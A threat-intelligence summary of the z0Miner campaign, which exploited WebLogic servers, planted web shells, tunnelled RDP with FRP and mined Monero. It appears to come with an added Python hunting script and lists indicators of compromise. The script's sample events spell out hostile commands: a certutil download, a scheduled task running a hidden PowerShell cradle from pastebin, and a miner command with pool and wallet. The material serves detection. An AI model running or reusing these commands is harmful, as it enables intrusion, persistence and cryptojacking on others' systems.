Keypoints
- z0Miner exploited WebLogic (CVE-2020-14882/14883) and other exposed servers to upload JSP web shells (JSP File Browser, Shack2, Behinder).
- Compromised Korean web servers were reused as malware download hosts serving miners, FRP binaries, Netcat, AnyDesk installers, and scripts.
- Windows deployments used powershell.exe and certutil.exe for retrieval and persistence; Linux hosts used curl to fetch payloads.
- Remote access and control used Fast Reverse Proxy (FRP) for RDP tunneling, Netcat reverse shells, and AnyDesk for GUI access.
- XMRig miners were distributed in OS-specific builds (Windows 6.18.0, Linux 6.18.1) and configured to use pool.supportxmr[.]com with hardcoded Monero wallets.
- Persistence was achieved via WMI Event Filter/Consumer and scheduled tasks (schtasks) that invoked PowerShell scripts hosted externally (pastebin links observed).
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Used WebLogic vulnerabilities to gain access (‘used CVE-2020-14882 and CVE-2020-14883 vulnerabilities to attack WebLogic servers.’)
- [T1505.003] Server Software Component: Web Shell – Uploaded JSP web shells (JSP File Browser, Shack2, Behinder) to maintain control (‘used JSP WebShell… JSP File Browser, Shack2, and Behinder.’)
- [T1105] Ingress Tool Transfer – Downloaded binaries and scripts using PowerShell, certutil on Windows and curl on Linux (‘They used powershell.exe and certutil.exe against Windows, and used the curl command against Linux.’)
- [T1546.004] Event Triggered Execution: Windows Management Instrumentation – Created WMI Event Filter and Consumer for persistence to execute PowerShell from pastebin (‘registered WMI’s Event Filter and Consumer … to read a Powershell script from a certain address of pastebin.com and execute it.’)
- [T1053.005] Scheduled Task/Job: Scheduled Task – Used schtasks to schedule recurring execution of downloader PowerShell scripts (‘registered … Task Scheduler (schtasks) to read a Powershell script … and execute it.’)
- [T1021.001] Remote Services: Remote Desktop Protocol – Employed FRP to proxy/tunnel RDP sessions for remote access (‘used a proxy tool for Remote Desktop Protocol (RDP) communication.’)
- [T1219] Remote Access Software – Installed AnyDesk to obtain interactive remote control (‘downloaded AnyDesk’ via PowerShell from the compromised download server.)
- [T1059.001] Command and Scripting Interpreter: PowerShell – Used PowerShell scripts for download, execution, and persistence setup (‘The threat actor used the download server … to load the Powershell script’ and various PowerShell downloader code samples.)
Indicators of Compromise
- [IP:Port] C2 / remote servers – 107.180.100[.]247:88, 15.235.22[.]212:5690, and 15.235.22[.]213:59240
- [Domain] Mining pool – pool.supportxmr[.]com:443, pool.supportxmr[.]com:80
- [Wallet] Monero wallet used in config.json – 44VkCrG7DkmYCcrNQcBb1QfZ66si2xWqy7HuzgyWLXKy8x3pkzKWxs8TptTNjCS1b2Abm89MuXD1tg81KeRgfP2u3z6f2kP
- [File names] Notable payloads / binaries – userinit.exe (Netcat), svcho.exe (frpc), frp5.exe, and other launcher scripts
- [File hashes MD5] Examples from reported samples – 523613a7b9dfa398cbd5ebd2dd0f4f38 (userinit.exe), 2a0d26b8b02bb2d17994d2a9a38d61db (x.rar XMRig exe), and 19 more hashes
The technical sequence observed begins with exploitation of exposed WebLogic/Tomcat servers using known CVEs to upload JSP web shells (customized JSP File Browser “Zubin”, Shack2 V1.0, and Behinder). Once a web shell is present the actor stages download commands tailored to the host OS: Windows targets receive PowerShell and certutil-based retrievals while Linux targets are fetched via curl. Compromised Korean web servers were reused as HTTP download hosts serving XMRig miners, FRP clients, Netcat binaries, AnyDesk installers, and various scripts.
For remote access and lateral control the actor deployed FRP (both default frpc and statically configured/custom builds) to create tunnels for RDP, and used Netcat for reverse shells (observed as userinit.exe) to obtain interactive command execution. AnyDesk was also installed via PowerShell on some victims to provide GUI remote control. Persistence mechanisms included registering WMI Event Filters/Consumers and creating scheduled tasks (schtasks) that periodically invoked PowerShell scripts hosted externally (pastebin references), ensuring re-delivery of payloads.
The monetization component centered on Monero mining: the attacker deployed XMRig (Windows 6.18.0, Linux 6.18.1) under process names like javae.exe, with a config.json pointing to pool.supportxmr[.]com and a hardcoded Monero wallet. Detection and containment recommendations implicit in the technical findings are to patch WebLogic/Tomcat services, remove unauthorized web shells, block listed C2 IPs and mining pool domains, and hunt for the listed file hashes, filenames, and persistence artifacts (WMI subscriptions and scheduled tasks).
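The hunting recommendations above can be turned into concrete checks. The following Python helper is an added example, not code from the ASEC report: it applies the report's indicators (C2 endpoints, mining pool, wallet, two of the MD5 hashes) and the behaviours in the MITRE list (certutil and curl retrieval, PowerShell cradles pointing at pastebin, schtasks persistence, WMI event consumers, Netcat masquerading as userinit.exe) to a set of constructed log events. The event field names (`command_line`, `image`, `md5`, `dst_ip`, `consumer_template`) are assumptions loosely modelled on Sysmon process-creation and WMI records, and every sample event and URL is made up for the demonstration.

```python
import re

# Indicators from the report, refanged for matching (the page prints them with [.]).
C2_ENDPOINTS = {"107.180.100.247:88", "15.235.22.212:5690", "15.235.22.213:59240"}
MINING_POOL = "pool.supportxmr.com"
MONERO_WALLET = "44VkCrG7DkmYCcrNQcBb1QfZ66si2xWqy7HuzgyWLXKy8x3pkzKWxs8TptTNjCS1b2Abm89MuXD1tg81KeRgfP2u3z6f2kP"
KNOWN_MD5 = {
    "523613a7b9dfa398cbd5ebd2dd0f4f38": "userinit.exe (Netcat)",
    "2a0d26b8b02bb2d17994d2a9a38d61db": "x.rar (XMRig)",
}

# Behavioural rules over the process command line, tagged with the technique
# from the MITRE list above. They are deliberately coarse; tune before deploying.
COMMAND_LINE_RULES = [
    ("certutil download", "T1105",
     re.compile(r"certutil(\.exe)?\s.*-urlcache\b.*https?://", re.I)),
    ("PowerShell cradle pulling from pastebin", "T1059.001",
     re.compile(r"powershell.*(DownloadString|Invoke-WebRequest|\biwr\b|\biex\b).*pastebin\.com", re.I)),
    ("schtasks task that runs PowerShell", "T1053.005",
     re.compile(r"schtasks(\.exe)?\s+/create\b.*powershell", re.I)),
    ("curl dropping a file into /tmp", "T1105",
     re.compile(r"\bcurl\b.*https?://\S+.*-o\s+/tmp/", re.I)),
]


def scan_event(ev: dict) -> list[str]:
    """Return the findings for one event (empty list means nothing matched)."""
    hits = []
    cmd = ev.get("command_line", "")
    for name, technique, rx in COMMAND_LINE_RULES:
        if rx.search(cmd):
            hits.append(f"{technique} {name}")
    # userinit.exe is a legitimate Windows binary only under System32; the report
    # saw Netcat running under that name, so flag copies anywhere else.
    image = ev.get("image", "").lower()
    if image.endswith("userinit.exe") and not image.startswith("c:\\windows\\system32\\"):
        hits.append("userinit.exe outside System32 (Netcat masquerade seen in report)")
    md5 = ev.get("md5", "").lower()
    if md5 in KNOWN_MD5:
        hits.append(f"known hash: {KNOWN_MD5[md5]}")
    # Renamed tools (svcho.exe was frpc) defeat name matching; the endpoint still gives them away.
    endpoint = f"{ev.get('dst_ip', '')}:{ev.get('dst_port', '')}"
    if endpoint in C2_ENDPOINTS:
        hits.append(f"connection to reported C2 endpoint {endpoint}")
    if MINING_POOL in cmd or MINING_POOL in ev.get("dst_host", ""):
        hits.append(f"XMRig mining pool {MINING_POOL}")
    if MONERO_WALLET in cmd:
        hits.append("hardcoded Monero wallet from report")
    # WMI Event Consumer whose command template launches PowerShell (assumed field name).
    if ev.get("event") == "wmi_consumer" and re.search(r"powershell", ev.get("consumer_template", ""), re.I):
        hits.append("T1546.004 WMI event consumer launching PowerShell")
    return hits


def hunt(events: list[dict]) -> dict[int, list[str]]:
    """Map event id -> findings, keeping only events that matched something."""
    findings = {}
    for ev in events:
        hits = scan_event(ev)
        if hits:
            findings[ev["id"]] = hits
    return findings


# Constructed sample events: ids 3 and 6 are benign controls, the rest mirror the report's TTPs.
SAMPLE_EVENTS = [
    {"id": 1, "event": "process", "image": "C:\\Windows\\System32\\certutil.exe",
     "command_line": "certutil.exe -urlcache -split -f http://download.example.test/svcho.exe C:\\Users\\Public\\svcho.exe"},
    {"id": 2, "event": "process", "image": "C:\\Windows\\System32\\schtasks.exe",
     "command_line": "schtasks /create /sc minute /mo 30 /tn Update /tr \"powershell -w hidden -c IEX(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PLACEHOLDER')\""},
    {"id": 3, "event": "process", "image": "C:\\Windows\\System32\\userinit.exe",
     "command_line": "userinit.exe", "md5": "00000000000000000000000000000000"},
    {"id": 4, "event": "process", "image": "C:\\Users\\Public\\userinit.exe",
     "command_line": "userinit.exe", "md5": "523613a7b9dfa398cbd5ebd2dd0f4f38",
     "dst_ip": "15.235.22.212", "dst_port": "5690"},
    {"id": 5, "event": "wmi_consumer", "consumer_template": "powershell -w hidden -c <script fetched from pastebin>"},
    {"id": 6, "event": "process", "image": "/usr/bin/curl",
     "command_line": "curl -s https://mirror.example.test/index.html"},
    {"id": 7, "event": "process", "image": "C:\\ProgramData\\javae.exe",
     "command_line": f"javae.exe -o {MINING_POOL}:443 -u {MONERO_WALLET}"},
    {"id": 8, "event": "process", "image": "C:\\Users\\Public\\svcho.exe",
     "command_line": "svcho.exe -c frpc.ini", "dst_ip": "107.180.100.247", "dst_port": "88"},
]

if __name__ == "__main__":
    for event_id, hits in hunt(SAMPLE_EVENTS).items():
        print(event_id, hits)
```

Event 8 is the instructive case: the renamed FRP client matches no command-line rule and no hash, and only the network indicator catches it, which is why the IoC list and the behavioural rules need to be applied together. In a real deployment the events would come from the SIEM rather than an inline list, and the hash check only covers the samples the report published, so it should be treated as confirmation rather than primary detection.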
Read more: https://asec.ahnlab.com/en/62564/